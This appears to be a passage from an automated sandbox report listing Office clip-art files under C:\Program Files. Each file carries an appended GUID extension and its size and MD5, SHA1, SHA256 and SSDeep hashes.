SHA256: 25f28fcc4dafd9fd6df80096feba06d5f57bd9a467fbe99f34051714ff606a92
SSDeep: 768:ZkWhtjL1V0j5BaxKBEI36u0iY1K+quG2BO0QmaMJ0aXEn5Rr4ql:ZXCrtZ385qp2BO0kMqT5RNl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.91 KB MD5: 9f90041450de6894686aada2e57e373a
SHA1: 8b69105d55fbe138cb59d848135a8a97cccb6eef
SHA256: 75d5f5b482e51603f6ca0848b4b1436ce421809b2b334919892167231c805951
SSDeep: 768:RraNm7quuRp2cddAOUdK3os7PJNjNepeOVXF5Ad:RMpbddAOUQ35DjNPO5nAd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.47 KB MD5: 3bf6c160255b7b628fd59af15b7fb6ad
SHA1: 8a0a7f752926ce316208e7a21069ccf26c6b4a3e
SHA256: 7c7a0c717dbcd32386a6be4718e17863844b5b8a170addbafe1b5565b75c1f3e
SSDeep: 384:b0gcq19zfo4k+CEI1UaCmAOmX6w4OUXwVZF6c9K6tX0SIaDt1UHMJUy3QPnd8EL/:b+q1hfdZtrKwdUW6ks+AsiyAPnCEA6D
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 22.79 KB MD5: d332a17a12068066f69b5ceac326ef07
SHA1: a738aed78a6e5c3973aa95430fe4ab330982d0d4
SHA256: 452ce890d4e39b9a3440718c040a5230fad7c2bede902a073b6b13751e1ceae1
SSDeep: 384:C69UxWeHF06eJX4SRyPeTqsDM2NW7sG85m+454BkN3UZflq8O:9aNDeHqeVAoc58s+454BkkRlqb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.29 KB MD5: 8be77196d9b5953e67b0f740a9c22e09
SHA1: 723b5e9ba50b0469a1b09e53dcc5160e6b57f481
SHA256: 35bfe4746d438bacbebe033aa74cd2b826db61f152bc22fee55a22702caf8c23
SSDeep: 768:qrblLbtuuVu6e0CdfiwdNLdG3qSuvo7SWT4W8h:ql/see0ul5/ZvoLT0
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.51 KB MD5: 7ea098ae7ff3d7c2b5c0f220bf903b94
SHA1: 2e0e84b24325ab14e9ceecf64be0c46d59f65baa
SHA256: 749437d8170e6660fc9a8d3076f4d3d0e34b0e3a070e896e19c33db331996c11
SSDeep: 768:mtrhTqklybkUNt/lWMNUtkMuDXyvg7Jtny7JX90tqvxsHEbJ:m5htlYt/lTUGMuDXEgtncJX90AOOJ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 31.36 KB MD5: e8ec64b77bb9ea00b4a963a13d28a0c8
SHA1: d6f5f4549050715e29c454c6d567c72542b681b3
SHA256: 762666b17cdf73fe310f22e2a2abfeb970172a75e5c784574b52c3b91412f784
SSDeep: 768:d2sotiO+nqZWZtPJxQu6kno0WqcacPJjGXFbLFM/ZsI7XBKLcK:d2xUO+bZtIqoFRYLMZsMOF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.23 KB MD5: 23e885d9e39f9fcf54090a8cf88de495
SHA1: 0b483983c47fcf6131a8b34f381440195069b197
SHA256: 865070fe8cecdd837546d60960af61150757e6473303dfc2f5e6948848ca7294
SSDeep: 384:LM4EjWzF4zQBRPAYgOStXO+gwrLs/exmroaW4Qer4Z3jKCfG86l5hXj:aKF48zlgOs5rLsWOovVLZ3jKCyl/z
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.82 KB MD5: fa930634bd175a73af31d8c03903dc9a
SHA1: 77315007c4b1afcc3a16ef035d0d67efe290ac97
SHA256: 7935a235c700a773f93913f0eeda4bab432fa9310f91e4e8414adac1c83d3737
SSDeep: 384:4W3a5ofcpvT7zpZsyaOSylbOEfRtwwjbAzmVnjZQRR+4N2jF4SBRcf+OUME3P7Cp:4n5ofcpvT7zpZsyaOSylbOEfRtwwjbAx
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183172.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 29.09 KB MD5: 2d9535a466255bc92ba7cd695d5d8c93
SHA1: f9077ef671690008cc7cb13d52ccab05dc86f110
SHA256: be6722b9ece4034982ad0873f274c9bf398f27a4b88ec0d32ecad0c2172e71c6
SSDeep: 768:m4sZt/CWxXa7r+yL3LkqT+ms02saRSjkWwPc24PFtpM3ygKzie03lUD3iBy8DJZp:XUXe5D3bMVaWX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.82 KB MD5: 610078a7cfa5ff633822d3719ab5f9aa
SHA1: eab1a8cdf86e20e3147c3ea0eca7cef4d64797e8
SHA256: 27dfb0ec5595ff5bb9c6a067e33240b556ba825e2be9e6a0649bc50419afd7ac
SSDeep: 384:vksJqJlgIrJdC8hkhjoshkc2wlpOW3Zmq+o7CKZ1Koa56laZBhG3pLmkj8qJ9//F:vksYJlgIj/U1EwLOW3gq+o7C+1Q56lyE
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185670.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.13 KB MD5: 947173e0de6bd36fdba738a918cc8891
SHA1: 583b92ac5d8cb0c8172cf05306cf1029e454ae3e
SHA256: 652851efac64d87b2df3040579461d151336c821cc3ae59f81b0172000ea6143
SSDeep: 192:KvMriYWJIKb8EWKClgnWY0tBiliinE2mYyEYsXT06TlTXTTITCTOT8CTsTfTkc5E:KvMrZWJIY8EignX0tBi4inE2mDEYsXL6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 19.57 KB MD5: 551145399e7fb3a64614ae4b06c1c661
SHA1: 332a652d5209cf57a3ae982e9ad0c51bd7b8fa9d
SHA256: ae731576be878c91a30e43d7041e323c71bfd82d4c76a59056975e4269d910ac
SSDeep: 384:Zo3rhxJemDNRKX7CvYAAYT9bDt+RrMlGfMe5ccN/Vbw42wLmwAJFgz7trdd9k1g2:Zo3FxJeUNW7CoI9bDtzlGfMe5ccN/Vbw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.46 KB MD5: 47288a7a89af6074eedfff5177f4abab
SHA1: e2722229c1e831c4dd34feacfa232418b49583d5
SHA256: f761757e530cbccfd8752035b77f765bd86b8c498eeb3a139fb696c8d1f6dbb7
SSDeep: 768:a3BoywS44NSw7/TLX7jlBzSD7wl8jBSYnucSXExCqKevjhE7ytMhtHO5uI0cPhYR:+DHi6bm3E1v
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 58.33 KB MD5: 2a6a6ef4de28cc6c2f48f797aeab25b5
SHA1: 67dd8a1d67d091a5d2b66d326abbddafff2d0315
SHA256: 2c089de82db5228080bdfe9290b771db9e53bd033c23270dacd1d4b1035f425d
SSDeep: 1536:hCzZgUuM+G9oUoupVfEdInOAxL9Gga9hgF:hCzLlSUsdIr9XIh+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.18 KB MD5: 736993ace4291ab411e538bef6a58646
SHA1: 20bcab2f980104cd9db42f2c284b5e9d4bc20871
SHA256: 2d3763031e9236f1f059b2b4c46ee974cbd42b7deb54b2bda332da5ac6d30f31
SSDeep: 384:nbQiH9XgRmjbMR0qoZVYsIEkDE4xTYv71TbHa0o+nSTKGHCDqYUa5q2160LDO57c:nbQg9QRm3MR0qoZVYsIEkDE4xTYv7RbV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 25.26 KB MD5: 01a6e13313727a78eddd38a521ae9bbb
SHA1: 8ecb76798bac408c4b7ecbc86f0fe8c1b0e2704b
SHA256: c952ef5c6ce5b4a8db7880797965df0dd54e10e0e8696b0a56b1e650a27c3ece
SSDeep: 768:+ubFlBeXS9TDsXsoPNwaAFLZ6pTRecU2NNaWWoL08y+vb2uocT/DEz87tQwoMeTb:D/YS1rSLmj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.61 KB MD5: 95b47962002c35a8ea7fdecd83b8fbe4
SHA1: d3d55ce0864251372fb2e60524ba80fdbdd11a47
SHA256: 9aa14750ccf4961f345bdc1590edc54837d43e65c53fee876d78a6ed2178a19b
SSDeep: 192:0UjqR8ImOpPBdoCl9eovrkRHFpOG/2BtCGFaH8Nbh2EW7BY6VEvCkEdMf6xGOohZ:0U2R8ImOp5doCl9eOrkRHFpOG/etCGFl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.46 KB MD5: 3458eb5a258e0ccf7ec23ba8578eeb8a
SHA1: a8057d1df15f6675371542f5040dbec7b373d67f
SHA256: 0e295057496d84c579614ccf38c4bb7a92234f0f32e8dd704a1a35f6162272f6
SSDeep: 192:30faXZUcsBjFgQ4Pby6SdgV1C8hSIZMUVQ6Uh76h90+Qb9FkCDpTo3Yt5u3w4tJ/:30faXZtsBBgQwbyPdSgahZRehGh90+QS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186360.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.06 KB MD5: d4ddef0a810fe0641f0e5ce11f5baeec
SHA1: 9fec29561616cd0f5e568d954a9e4085c1748203
SHA256: 27da5ed026b61be3fa778991e074ed0548d5ef28d1ffbe45d8e6cd90422e7450
SSDeep: 768:OPuhUYcOwLobILW5cbDGV+WMaAMBndkCo5UtZAFYswXCGEULyu1xDduCtG1uFr6k:4mAZwx+yfZKtS3r
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186362.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.25 KB MD5: 8dc9e7923bfda4bc5ee33a8ef38908ed
SHA1: 32753c63f2506fb6feb74cde73076fd7261dbeb4
SHA256: 6b91150ef3b1dc72d7bc5167c942bb234745eb1473764a5d610763eb5722ed52
SSDeep: 384:ooDJfASGPWok5vy3/iOc3wVnMNNudsuzzEnLx8KvOPULVgUMci1GxZPGMn9WNm/7:VDJfASGPWok5vQ/iOcAVnMNNudsuzzC3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.44 KB MD5: 848529dadf6625acf18a5bc38a73e746
SHA1: 3a01b76207b5a9c20325bc219f7ebd2c7486011f
SHA256: ebfec8db64524cbfce5066b10cc464e1a1fb44d7ad19d70f9f0fa17fb0bff724
SSDeep: 192:J5fGGnxiiGAR7KTBGf3WJTPlW6JRNuYTy6grEJtXVCmVjzvP/t:J5fGGnxxJR7KTBGfiPlW6JRsf6grEJtT
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.25 KB MD5: 6cc4a451305293b219ce8a23379577a2
SHA1: 13c9ed1f366c8ee535639b345b7a8d9db5d20d06
SHA256: f11d73db156f09b3f2b1279e303181a6c45d45a5a504e0fcfee3c9e90529789b
SSDeep: 96:9aTfQvkobhWtE/pg5mbmnGcGqObd0EgdPm9TNjk9jpEfKCHrifiWqTbT2vpdTdTU:0TfOkostE/W5moBGqOJzghm9TNjsrCLn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.11 KB MD5: f3e9e34ec1131c53ffbadde18340d1d7
SHA1: d7519a0612bccda74b99a25d581fd63f75d7968c
SHA256: 4403fcba18f66db5b69722fb007e523aacb0b5009dfe11f7ce6206a62bc1ea4e
SSDeep: 192:g8ssvibbA4YX17pp/cME8/BlhHTMaU0UOOahs00k4Ui65m/Zomemrx8vK1+1CU5x:g8ssvibEFF/dE8/B/HIad7OahsFUi65F
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.33 KB MD5: 30b23aed1fd4c169c0df901f14c022ee
SHA1: ff1b46031881005bd123f530b5eea5e0e88f812d
SHA256: de8a8a2a01a29ea1079e0493ab2ae1b0505b49323d5c577d0b5c0e54b5f1b27a
SSDeep: 192:052022ih6mtm3Jrjm/JSlOT3mMjk6EWmzo7mUeDTJcRDeJwlBh4V09998D:052J2g6uMJrjeJSlOT3mMjDHYoCUeDT9
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.06 KB MD5: fd3d75a350494f154ed92c1f05f4d4ff
SHA1: 4a052c44155b0f22479c2588c04af32ad27d63f2
SHA256: ce1aeaed6c24254b7d5401783a226869300439903706f479424f807c94482f4b
SSDeep: 384:7k8mMm7BdkZ0ja+k3WxmTpSp7UC/MBahgimZaRD0d5zkRBNbtx2AzVf/6fLMw0:7nmMm7BdkZ0ja+k3Wx+pSp7UC/MBahgG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187835.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.13 KB MD5: 5557dad15ab616e403711d1b6bc0b60e
SHA1: d1a66bef1c7a240f4564c0b1f21cc93b8a32d0e6
SHA256: 03f316e740dc340a9b1c68d233f809c64cdc5695fa11becb5c35a501f791e41b
SSDeep: 192:9k6QVZ38JuuzGQDKk0LZnt7ShBmTNzIKGRh4m4+E5MkjwteeHRc8KreU5oVsqU4f:9FIZ+fZmkoZt7CmTNzjG8mfqVjwteReR
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.97 KB MD5: 9230aa1e0c63d8a59abb8bb3bf3b3da5
SHA1: 29ee10daeb29652f8226c4edebd0d78689161628
SHA256: 56f5e88ddfe32b554a8d2e39dcf4f1659c2518358eedc1cd9d69f764cd84a8e4
SSDeep: 384:HGGZTko7ORyqActdC435qtXmz4d45Xe21FSrX+Zp/C+yrwN1n8yEa73qk6P94S5T:HGM57ORyJctE4pqlmcd45Xe21FyuZpa7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.25 KB MD5: f26d21b744764edee3695b0b043f77f5
SHA1: 44da02cdc5f6e863f9f11e6a99fc138c83772ac5
SHA256: 905e1d78892db53cb881a55f7e4a02eb39154b1d8eb81c4f936c70551b99a7de
SSDeep: 96:TJvpCDSsH271zcUOjQyP2l2ro94ZKLVg3BcHPDAT4wVIV8maAkWBA9oJ+zRtLkIg:FRCusHg1jaQKAc+4ZQVg3BcHbAJyN5SG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187849.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.40 KB MD5: 6bb94d96e31adfb54fc28b9dd5c8ef6d
SHA1: be3092300f7751f1d771576b2c04d765fa2d0c43
SHA256: c5a35c74c7a2b59928c2d53fbb9e122237892f18a9cfcfeaa02fd2df6087c407
SSDeep: 192:mYLYwTDZTDTBTlfTtTvrTgTpTzgTlTSTLTuTpTpTTTz9Oyz8Z3Tq1SF0taPuRQV6:mYUwZH1pfZTrU9/gp+/C9d/X9OyzKjqX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.67 KB MD5: e26b4ab4149899d3d38df48facd7ce28
SHA1: de92564956485496bf7fdb130b7a0fde76615029
SHA256: e637ae9f218256dd0d35f47587bc9e4160e63985c5c6d4363e300746a834f6a9
SSDeep: 48:1iaB4gYT8S4pns6OIkb3syMb3Psb3Ub3Uwb30b3kIdJJsb3q4b3sz9b3Wb3itdbM:ccJHps6YTbMTPsTUTbT0TkIdJaTq4TWm
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.59 KB MD5: 3db7d35e0e03b06c182148a70044ac1d
SHA1: a6aa0b1b54b637302f0dbd40c060637ed1e410e8
SHA256: 7f7266eacd2a4df6b99624c2037b58a1ce376477992be835c372223292dbd62a
SSDeep: 96:SJIeWMU+GQAWHx2DBHyRbbxTXYocZB9iEMLbYiy3hzGw391yAU1QvSX/DxFTd4:oIeA+G8Rk5y99TXxcAE2bFyxzGw391yK
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187883.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.05 KB MD5: 8ec6212fb5a8ec387c2b442498033b69
SHA1: ff76ec6c216b84a264dde5dcb7241d7e62def7b9
SHA256: f26a44984a93a84a6be1cfd0d1ee6cf65e3c4b7525120bffb7493f69b4e85c45
SSDeep: 48:1NB4gYT8vgQg/jegh5dUAaHhHbj6mr86uBaGZYOeW:fJvgQiF52AeHxrOcPS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188511.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.47 KB MD5: 17ddc99bbdeb2e80e835e2013d734d15
SHA1: 00d9aff0fbb3d10b66f6800e1e82b788279b1cf7
SHA256: 5a5d5d98be607076a6260d8d9b49ffe0fe1f78689ec31084efcfbe9bbc8715c5
SSDeep: 192:IPz4Z1A7V4pObykmzXjhs7o3yKE5WGGb+R4T/tVgoTKI/d6ug+UZxXUiNwVv6VeZ:s0Z1Axik0XG70GHR4TkI/d6ugLZxXUiC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.00 KB MD5: e37f6db10cf20985d3eedb3a5e567cef
SHA1: f32a4d65fb4342780ccd1bb1b197bd721f4c843b
SHA256: d45b69e56c1d1fe47255ddf98741676156bd126041bd36e4ddfe05df2118eca0
SSDeep: 384:Dkbm3gGv+lKt5fPwSgN6wgMKB+9SmFMWi5NnDS/jyJJ9lvelEyWcFbu5r8/YsABr:DOWgydt5gSgEw3m+km2Wi5RDGjYJXmCV
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.84 KB MD5: 67c498191ddadf6b3276cdf3cd05ad20
SHA1: 1648146b1592e938860742e9e8e7504c62f3ccf1
SHA256: b12ec3f6e53f827011277679eb46d14f2a8ae81c611984550a9cc3e509c624d0
SSDeep: 384:Fxy0PiW+s1NuL+wxCRoZ/Drx2wwTHbq2BSJAy+44XxHD6qdCLoGRZr6LpxFXy687:Fxy0Pits1NuL+wxCRK/DVAbbq2BSJAyP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.66 KB MD5: d50b5333cf4ad8d488622ca992b0bbf2
SHA1: 65e8a6cfae3a189ab4efcfbf04554a0463d2e890
SHA256: 0918d02a0b2ada41371e125df567ead26b2931274408e5ef0c72e7823d7f461b
SSDeep: 384:0YDhGzoce9YyyIFoCHzkKG2gEAQLTGgR7F/6wBe2m/ZEuzTO8+imbEAEPBYZUm6J:0YDhGz5KyIFoCHzZG2gEAMTGgR7FSwBo
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.91 KB MD5: 2acba3b7ab350b1920eaa289fac8eb5b
SHA1: 4f9138f9bc1ada39cbc1aebf4f2311b6ab2443c3
SHA256: 02b769907ffac6df4191463ef03f73915e7c74cedddd21ae89017f696f019292
SSDeep: 768:MZJBT6LY0UKE+E2DaRX1Dd9GJiGF39mqGoQTp9gmQjwxdrS9ZF9cxsGQg5U168wR:y9jrzeqObLJmf59
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188679.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.85 KB MD5: a80308bdb2e3df31365191857c09e9c3
SHA1: 152cf898ce8c0f9a85bbd94b85bed2a076971f76
SHA256: e53c9b09f8eb2f111e5b458b2220b888fec5c39c355398987a895dae1d100c24
SSDeep: 384:Rf1R8EtRl17GnfuCc7UqHjp+eEdfrZYegT5OrYYxUJY9aWGm0jzG6SXXXcPOo16T:Rf1R8EtRH7GnfuCc7tjp+eEdfrZYegTO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.16 KB MD5: bb51d30b47bbb81cf3625ad9bd8098c7
SHA1: 21ae8d334762b8dc4f8566c6acdb5b1a657afcbc
SHA256: a1d230521fb5063be7d24620938e529f3b193e6188d5482146f68de600573a6b
SSDeep: 192:WNUY6oPZWsRkamb8A0zO5lqK+ciMHl4gK+W:WNURQRkamb8TzGlsciil49+W
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.12 KB MD5: db26bb829642dd2efdad4ccb5fb411ab
SHA1: 62ef07b2877c193520308c146e67a294dfde5f63
SHA256: 56559c45e7651e5f04220a370786bcf9a4f1aeae586349f543b8a3fcf40c58b0
SSDeep: 192:W9eQLSmMPv2Upnq0twZTV+1rXxTYhlzbps3MlH2jUeRjvSlUyh:W9eQLSzv2UQ1V+19TYhl/hGRjalUyh
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.59 KB MD5: 02be701c4512c1867580dbb506d21ab2
SHA1: 9f8462172ead3877a4f53f078075d5c72dcf958d
SHA256: fc0a999983f9b1d8cda873a599a9d6cb4a4ade7dc97a6282adcc24dfe988cd55
SSDeep: 96:DZ2Yy5V/zyZyFqyq7qKAPOoZzCv64FMFXt1oELxhLT8hYzQGxW:V2YAVbIUqZ7qKGOECxiFHoELxVTiy7A
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.64 KB MD5: adc02b3bd0d44cb8c01dc7ec9394e421
SHA1: d05cf1ba45efd44a5aeea7febf1267e26cd98b83
SHA256: 745c527dae1cfa28c22e2e2572e32b890d50c29790b71714c5c1624b5cb2720b
SSDeep: 96:imtbvRYxpMgW59hzvL9qu7JZjgcV1wck/tALO8UHVVBDnRzauri4:nPH9h7J9BVV1+/eKP7pnlaul
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.20 KB MD5: 26f275599d545e1ec4607f7adcf0204a
SHA1: c408867c9bf62609b74794cdaa043913db4c86cc
SHA256: 03ca13d4e361c92263a51e721e59198d4a8f273de62fba7617e9807e04b28219
SSDeep: 96:N7U2h26k5DcJAk5o+hvKymMZawOZsVXkkX+Io5/2zC4vJKEPsD3+AMcV6GZ150nT:lsH55ky+hzZa3ZshkU+P5/2e4+3scEGQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.75 KB MD5: 46be4cac7ea5e753fe016780d7fe1154
SHA1: 9cafadccda10409897f02ecca0409a251c759e38
SHA256: f7d057718c95adb07474c94c69609be9f0092fa2604000aa6c43569bff96c725
SSDeep: 192:zMKztlmX/q9fNnqWic5SqCsqGod4ELN0+:zMKz3mX/q/nttesqGW4ELNZ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.58 KB MD5: f29ecb4b8876b7178bd724567e757f14
SHA1: c4d2d89c4edf7478f4ba4a6915d3f0670ff0e61d
SHA256: b7bdb765c077f3be44ce7c6e986a014e23728430853e12d43563feb895824d7a
SSDeep: 96:bQEKy2+C/FiGPc9V0wl/X1rb5u50ErXbfUNZK8dCLuQdaAFh1SgPUbKJk7wWn1T+:bip+0i0aVj/lrb5rdK1uQVhSgCOGw41q
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198020.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 23.17 KB MD5: 81de588dd59a58f5a501893c0a730afc
SHA1: fb8e59cbea629de95dee95687200d7af13a6dd76
SHA256: 511a8aa264e6ebffb5f6c82a97aa43834dd9e16c9ffd211e624b918b4059d362
SSDeep: 384:DDoKZ+Cv1OKdbz0ZrejLbyS7oOkCjd03EWIHqIAacaE7xsqkWgAkwadCkSt:DD/7OKOZre33oOAEWIbAacaE7f8Xl8t
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 34.09 KB MD5: ee01cf48c286c402809d5c9c1c32340c
SHA1: 0096158524e946d958f9181f1cf23fd77eb06907
SHA256: bd27b2c70251924f7dff188787bdedbb623bfad5f86a7daab8937497b6af755b
SSDeep: 768:EtC9GvH5T0Vj0WrUEdvvlMLQrBWcMXkNHvfpBQR:0CeH5Mxz9MkrBJh3DG
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.20 KB MD5: 7a6cae80d538d7cc7a1562a70453a95b
SHA1: 25dce15f501a2ad561d6bb51b4975f95b15fcaf4
SHA256: 199145c89063617f190b88d13716bf01d92c5dd1fdad9faee6c405638beecd6e
SSDeep: 384:HJGr5HVvPkv/3VLp4jtjHqlskMLgKBbXy:HJC5H1sv/3VladOM6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198113.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 41.28 KB MD5: 4581ce38608a77a74da1741330f4a450
SHA1: a892a8b46dd64a52719b4023cdec432b7fa9f433
SHA256: 05644eb04c3e7acb875da3ed0736b7c3794df307947497aea20a7cd8eccde384
SSDeep: 768:texSnjR4IBYTk7h43g1HmsNjoz59+nT5BJVZhpBFgkrDr7T9pOxv6:pnF4dTaHYqlvPhpgQT9pMv6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 56.37 KB MD5: 6dd80e520b6318d0d29e4414fc0296b0
SHA1: 42bcf68efa1293edb9117db44e6f17e7ddc9c857
SHA256: 594be0868cc19a392a35f2e3485c2f3dd4dd082bc2199e08847435aec207f1ef
SSDeep: 768:LZjXryJUr5lMsCjPrzotTsPDQrdYVg9y869m2aV1I2NwbOSo7chzwcWF/+3:F/SUfMsC0xs8rdYB869mJjIywy4S7F/2
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199279.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 28.33 KB MD5: 523c722fc213f7993ce318cdbb10f269
SHA1: d3c557ca6996a33bfefde3a3102309774bb28e6b
SHA256: 82cff38994b9334b0c202abbc6e172b2acf991ec72fcc3701fb51a40d0ae3478
SSDeep: 768:kgvtRW4kI888AP3RnMKYiFvIChAKp2bukM4:P1krIhC6IW/S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 13.80 KB MD5: 03aa068d5b0500b8d1e59b7b8144a7c1
SHA1: cc078356d332701f3b15fe69467c76f5fe2d7a92
SHA256: 07bd6f6f51dea5042680511f51f605c62e2024f3e882eaa5b26309015241bab8
SSDeep: 384:F21F1hYs5ZLwE5FUFBWf0ai18JKc4BYMS0xfWN2Ez8BtzEfPl/pJqjWbaj2QFE85:F2VhYs5xwE5FUFBWfRi18JKc4BM0xfWw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107300.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.40 KB MD5: abc367e9233859518e8f6ca53416bbc7
SHA1: a4cf9ab5cd4bfc6a5d792e66540ed7af1101a8a6
SHA256: c9b651d8a974c0a6235c651186723bd381e2849b62df37b91263de2322d3036b
SSDeep: 48:1hLiaB4gYT8FFVXLge2yEcTCVMnB6aWOQGBkkb1No3zQb8RgbW:/5JFFt0e28uVUB6BOQGTxNo3zEAgC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.60 KB MD5: 25e267c3b96b0cb371f7a34723b9c00a
SHA1: d0faaa7774f9442ed637e5355c103b37eded30fb
SHA256: 265ec135611e6569739ce8c8baa64db75115aff099a2c95fcf3159ee343f67af
SSDeep: 192:c0VnRlpoZodzANMTqnikO4jv7QyEEeaWFw7DnR1miVkyMk5vB2KH8tscaU+ICner:bVnRlp8OANMGnibev7QyLeat7DnTmieB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.15 KB MD5: d2eb0ddc972feabfa42c0b61b788685e
SHA1: a9c6076cb4f3dbc25a6613f501c805c942f32f81
